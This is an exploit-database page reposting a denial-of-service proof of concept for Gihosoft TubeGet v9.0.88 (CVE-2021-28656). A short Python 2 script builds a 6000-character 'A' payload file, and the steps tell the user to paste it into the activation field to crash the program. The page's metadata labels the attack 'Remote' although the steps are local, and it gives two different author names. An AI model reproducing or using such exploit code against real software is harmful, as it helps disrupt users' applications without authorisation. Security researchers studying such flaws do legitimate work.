Advertisement






Gihosoft TubeGet v9.0.88 Denial of Service Exploit

CVE Category Price Severity
CVE-2021-28656 CWE-399 $1,000 - $5,000 High
Author Risk Exploitation Type Date
John Doe High Remote 2023-03-08
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023030020

Below is a copy:

Gihosoft TubeGet v9.0.88 Denial of Service Exploit
# Exploit Title: Gihosoft TubeGet v9.0.88 Denial of Service Exploit
# Date: 07.03.2023
# Vendor Homepage:https://www.gihosoft.com
# Software Link:  https://www.gihosoft.com/download/?id=tubeget
# Exploit Author: Achilles
# Tested Version: v9.0.88
# Tested on: Windows 7 x64
#            


# 1.- Run python code :Gihosoft_TubeGet.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Gihosoft_TubeGet and Click 'I already have the key'
# 4.- Paste the content of EVIL.txt into the Fields
# 5.- Click 'Activate' and you will see a crash.
 
 
 
#!/usr/bin/env python
buffer = "\x41" * 6000
 
try:
        f=open("Evil.txt","w")
        print "[+] Creating %s bytes evil payload.." %len(buffer)
        f.write(buffer)
        f.close()
        print "[+] File created!"
except:
        print "File cannot be created"

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.